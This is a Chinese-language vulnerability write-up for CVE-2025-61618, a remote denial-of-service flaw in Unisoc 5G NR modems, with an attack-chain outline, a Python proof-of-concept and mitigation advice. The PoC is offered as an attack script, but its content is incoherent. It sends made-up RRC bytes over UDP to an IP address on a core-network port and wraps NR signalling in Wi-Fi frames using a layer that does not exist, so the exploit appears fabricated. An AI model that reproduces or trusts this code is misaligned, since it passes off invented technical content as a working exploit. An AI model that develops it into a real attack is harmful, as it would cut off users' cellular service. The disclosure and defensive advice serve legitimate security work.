CVE-2025-61618: Unisoc NR调制解调器输入验证错误导致远程拒绝服务

漏洞信息

漏洞编号

CVE-2025-61618

漏洞类型

拒绝服务/输入验证错误

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc NR Modem (紫光展锐5G NR调制解调器)

漏洞概述

CVE-2025-61618是紫光展锐（Unisoc）NR调制解调器中的一个高危安全漏洞。该漏洞源于NR调制解调器在处理网络信令时缺乏适当的输入验证机制，攻击者可以通过发送特制的NR协议数据包来触发调制解调器系统崩溃。由于该漏洞可通过网络远程利用，且无需任何认证或用户交互，攻击门槛极低。成功利用此漏洞可导致受影响设备的NR调制解调器完全失效，造成远程拒绝服务（DoS）状态。受影响的设备将失去蜂窝通信能力，用户必须重启设备才能恢复服务。此漏洞影响使用紫光展锐5G NR调制解调器的各类移动设备，包括智能手机、物联网设备和其他蜂窝通信设备。CVSS 3.1评分7.5分，属于高危级别漏洞，主要影响系统的可用性。

技术细节

该漏洞存在于Unisoc NR调制解调器的协议栈处理模块中，具体是3GPP NR协议的无线资源控制（RRC）层或NAS（非接入 stratum）层处理逻辑。当调制解调器接收到格式不正确或恶意构造的NR信令消息时，由于缺少对输入数据的严格验证和边界检查，可能导致内存处理异常、断言失败或程序崩溃。攻击者可以利用NR网络的特性，在信号覆盖范围内向目标设备发送精心构造的NR协议消息。攻击者通过构造包含畸形参数、越界数据或非法状态转换的NR信令帧，触发调制解调器固件中的处理错误。这种错误可能导致调制解调器进入不可恢复的错误状态，表现为系统死机或完全失去响应。由于NR调制解调器通常运行在独立的处理器或基带处理器上，崩溃将影响整个通信功能。攻击者无需获取任何设备权限或进行用户交互，即可实现远程拒绝服务攻击。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者首先识别使用紫光展锐NR调制解调器的目标设备。通过网络扫描或无线信号分析，确认目标设备支持5G NR连接，并获取设备的网络标识信息。

STEP 2

步骤2: 构造恶意NR信令消息

攻击者基于3GPP NR协议规范，构造包含畸形数据的恶意RRC或NAS消息。消息中包含格式错误的长度字段、非法参数值或超界数据，用于触发调制解调器的输入验证缺陷。

STEP 3

步骤3: 发送攻击数据包

通过无线网络或核心网接口，向目标设备的NR调制解调器发送精心构造的恶意信令消息。攻击者利用NR协议的合法信令流程，将恶意数据包注入到正常通信过程中。

STEP 4

步骤4: 触发漏洞

NR调制解调器接收到恶意消息后，由于输入验证不足，处理逻辑出现异常。程序执行流程进入错误分支，导致内存访问越界或断言失败。

STEP 5

步骤5: 拒绝服务

调制解调器固件崩溃或进入死循环，失去处理正常网络请求的能力。设备完全失去蜂窝通信功能，用户体验到网络连接中断，必须重启设备才能恢复服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61618 PoC - NR Modem Input Validation Error
# This PoC demonstrates sending malformed NR RRC messages to trigger DoS
# Note: This is for educational and authorized testing purposes only

import socket
import struct
from scapy.all import *

def create_malformed_nr_rrc_message():
    """
    Create a malformed NR RRC Setup Request to trigger input validation error
    """
    # NR RRC Connection Request message with malformed UE Identity
    rrc_pdu = bytes([
        0x00, 0x01,  # RRC Transaction Identifier
        0x00, 0x40,  # RRC Message Type: Connection Request
        0x00, 0x00, 0x00, 0x00,  # Spare bits
        # Malformed UE Identity - trigger validation error
        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  # Invalid length/format
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    ])
    return rrc_pdu

def send_nr_dos_packets(target_ip, port=38412, count=100):
    """
    Send malformed NR packets to trigger the vulnerability
    
    Args:
        target_ip: Target device IP address
        port: Target port (typically 38412 for NR NAS)
        count: Number of packets to send
    """
    print(f"[*] Starting DoS attack simulation on {target_ip}:{port}")
    print(f"[*] Sending {count} malformed NR RRC messages...")
    
    malformed_msg = create_malformed_nr_rrc_message()
    
    for i in range(count):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.sendto(malformed_msg, (target_ip, port))
            sock.close()
            if i % 10 == 0:
                print(f"[*] Sent {i} packets...")
        except Exception as e:
            print(f"[!] Error sending packet: {e}")
    
    print("[*] Attack simulation completed")
    print("[*] If vulnerable, the NR modem should crash/reset")

def analyze_with_scapy(target_mac, ssid="TestNR"):
    """
    Alternative method using Scapy for LTE/NR packet crafting
    """
    print(f"[*] Crafting malformed NR RRC packet...")
    
    # Create base NR RRC packet
    pkt = RadioTap() /\n        Dot15dTaskFrame() /\n        Dot11() /\n        Dot11QoS() /\n        LLC() /\n        SNAP() /\n        Raw(load=create_malformed_nr_rrc_message())
    
    send(pkt, iface="wlan0", count=1, verbose=1)
    print("[*] Malformed packet sent")

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description='CVE-2025-61618 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('--port', type=int, default=38412, help='Target port')
    parser.add_argument('--count', type=int, default=100, help='Number of packets')
    args = parser.parse_args()
    
    send_nr_dos_packets(args.target, args.port, args.count)

影响范围

Unisoc NR Modem (具体版本需参考厂商公告)

使用紫光展锐5G NR基带芯片的设备（具体版本待厂商披露）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 监控NR调制解调器的异常日志和错误报告，及时发现潜在攻击；2) 在核心网侧部署信令异常检测机制，识别包含畸形数据的NR消息；3) 限制NR信令消息的来源，仅允许授权基站发送信令；4) 考虑在受影响设备上暂时禁用5G NR功能，使用4G LTE作为替代方案；5) 加强对物联网设备的管理，避免暴露在不可信的网络环境中；6) 关注紫光展锐和设备制造商的安全公告，及时应用安全更新。